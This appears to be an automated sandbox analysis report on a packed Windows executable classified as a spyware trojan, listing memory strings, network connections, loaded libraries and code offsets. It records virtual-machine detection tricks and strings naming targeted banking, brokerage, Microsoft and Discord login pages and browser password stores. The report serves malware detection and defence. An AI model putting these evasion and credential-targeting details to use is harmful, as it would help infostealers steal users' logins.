              Source: file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2046828784.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2046828784.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2046828784.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.2046828784.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2046828784.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2046828784.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF49B00_2_00AF49B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B10D800_2_00B10D80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF16C00_2_00AF16C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B117400_2_00B11740
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5809B0_2_00B5809B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B940ED0_2_00B940ED
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C020A20_2_00C020A2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D000B80_2_00D000B8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF40C60_2_00BF40C6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4206E0_2_00B4206E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB80000_2_00DB8000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBE1B40_2_00BBE1B4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0C1F70_2_00E0C1F7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B001800_2_00B00180
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2A1E70_2_00D2A1E7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD81630_2_00CD8163
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C001000_2_00C00100
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8410E0_2_00C8410E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3C2CE0_2_00B3C2CE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFC2330_2_00CFC233
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D803C30_2_00D803C3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C343DF0_2_00C343DF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC03910_2_00DC0391
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6E3A90_2_00C6E3A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEA36E0_2_00CEA36E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDA3610_2_00DDA361
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6E31B0_2_00C6E31B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF63500_2_00AF6350
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C424EB0_2_00C424EB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEE4E40_2_00DEE4E4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE44960_2_00CE4496
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D924B30_2_00D924B3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D384B80_2_00D384B8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFA4750_2_00DFA475
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF44630_2_00BF4463
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D405DF0_2_00D405DF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAE5E40_2_00CAE5E4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6C58C0_2_00B6C58C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD05970_2_00DD0597
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1C5790_2_00D1C579
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D445370_2_00D44537
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3C6A60_2_00B3C6A6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7C6910_2_00B7C691
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C506EE0_2_00C506EE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA46F50_2_00BA46F5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA46AC0_2_00CA46AC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0C7980_2_00B0C798
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4C7FD0_2_00C4C7FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B167C90_2_00B167C9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7A75C0_2_00D7A75C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1672D0_2_00B1672D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3A77A0_2_00B3A77A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3C8B30_2_00B3C8B3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B448F30_2_00B448F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC289B0_2_00CC289B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD88BB0_2_00CD88BB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3A8160_2_00B3A816
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D148680_2_00D14868
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C009DE0_2_00C009DE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA89B20_2_00CA89B2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7697B0_2_00B7697B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF69600_2_00AF6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D529380_2_00D52938
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B70A900_2_00B70A90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B54A810_2_00B54A81
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B06A890_2_00B06A89
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC6AD80_2_00BC6AD8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B38A350_2_00B38A35
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB4A490_2_00DB4A49
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4CA4E0_2_00B4CA4E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6AA480_2_00B6AA48
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0CBFB0_2_00E0CBFB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8CBE30_2_00C8CBE3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C38B670_2_00C38B67
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B64B710_2_00B64B71
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB8CDD0_2_00CB8CDD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0CC680_2_00C0CC68
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8AC750_2_00C8AC75
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C32C7E0_2_00C32C7E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C36C3B0_2_00C36C3B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1CDFB0_2_00C1CDFB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B10DF00_2_00B10DF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B38DC30_2_00B38DC3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF4D230_2_00BF4D23
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E00D4B0_2_00E00D4B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEAD7C0_2_00CEAD7C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9AD6B0_2_00D9AD6B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD4EC80_2_00CD4EC8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE8E850_2_00BE8E85
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1CF960_2_00D1CF96
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD8F760_2_00BD8F76
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C68F150_2_00C68F15
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C74F300_2_00C74F30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFF0DC0_2_00DFF0DC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0D0F20_2_00E0D0F2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA30820_2_00BA3082
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD309E0_2_00DD309E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1709C0_2_00C1709C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5704D0_2_00C5704D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0506B0_2_00E0506B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3F02A0_2_00B3F02A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF10000_2_00AF1000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B1D20_2_00B5B1D2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B591010_2_00B59101
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B771550_2_00B77155
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFB1490_2_00BFB149
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B292B00_2_00B292B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3B2B00_2_00B3B2B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBB2BC0_2_00CBB2BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF52190_2_00BF5219
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5F2740_2_00B5F274
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6F2050_2_00D6F205
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF32700_2_00AF3270
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFD3C40_2_00CFD3C4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D813C50_2_00D813C5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA73920_2_00DA7392
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3D35C0_2_00C3D35C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4331E0_2_00B4331E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3B3000_2_00B3B300
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAB4EF0_2_00CAB4EF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD34860_2_00BD3486
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA349A0_2_00CA349A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0B4490_2_00D0B449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF741B0_2_00CF741B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7D4590_2_00B7D459
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD343F0_2_00CD343F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B655B90_2_00B655B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9B5AA0_2_00B9B5AA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B295F00_2_00B295F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0B5810_2_00E0B581
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3D5250_2_00B3D525
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF55700_2_00AF5570
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C9B5290_2_00C9B529
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF364F0_2_00CF364F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D796720_2_00D79672
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6B67F0_2_00C6B67F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF36600_2_00AF3660
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D156370_2_00D15637
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF379E0_2_00CF379E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3B7B70_2_00D3B7B7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D377600_2_00D37760
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C897350_2_00C89735
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBD8A90_2_00BBD8A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3B8E50_2_00D3B8E5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C738900_2_00C73890
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B838340_2_00B83834
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B218100_2_00B21810
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3D84A0_2_00B3D84A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8D9890_2_00C8D989
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0F9000_2_00C0F900
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B99AE50_2_00B99AE5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D25AAE0_2_00D25AAE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C9DBC80_2_00C9DBC8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C19BCF0_2_00C19BCF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C9FB6F0_2_00C9FB6F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3BC9A0_2_00D3BC9A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCFC8D0_2_00DCFC8D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B39C350_2_00B39C35
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B95C7A0_2_00B95C7A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3BDFC0_2_00B3BDFC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDBD670_2_00CDBD67
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B81D740_2_00B81D74
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B81D5D0_2_00B81D5D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B57D470_2_00B57D47
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C07EFF0_2_00C07EFF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B15EDD0_2_00B15EDD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEBE4B0_2_00CEBE4B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B69E600_2_00B69E60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF7E400_2_00AF7E40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF1FE50_2_00CF1FE5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B45F540_2_00B45F54
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00AF8850 appears 60 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00AF8F60 appears 137 times
              Source: file.exeStatic PE information: invalid certificate
              Source: file.exe, 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebdzshell.dll2 vs file.exe
              Source: file.exeBinary or memory string: OriginalFilenamebdzshell.dll2 vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2027923248.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2028049329.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2037137233.0000000001A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 6173144 > 1048576
              Source: file.exeStatic PE information: Raw size of .vmp is bigger than: 0x100000 < 0x5c8000
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp
              Source: file.exeStatic PE information: section name: .vmp
              Source: file.exeStatic PE information: section name: .vmp
              Source: file.exeStatic PE information: section name: .vmp
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B381D3 push ss; retf 0_2_00B381D5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D844AF push ss; retn 61A5h0_2_00CAA3F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4C903 push esi; ret 0_2_00C4C966
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B38D27 pushfd ; ret 0_2_00B38D28
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3AE06 push es; iretd 0_2_00B3AE3B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA9209 push ebx; retf 0_2_00DA925D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0B449 push edx; retf 0_2_00DA3B02
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3288B rdtsc 0_2_00C3288B
              Source: C:\Users\user\Desktop\file.exe TID: 1492Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 1492Thread sleep time: -30000s >= -30000sJump to behavior
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2037057528.0000000003EDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2027075463.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106722434.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074929034.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2036534716.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2108019419.00000000019BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
              Source: file.exe, 00000000.00000003.2027075463.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106722434.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074929034.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2036534716.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2108019419.00000000019BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000002.2107879483.000000000196E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
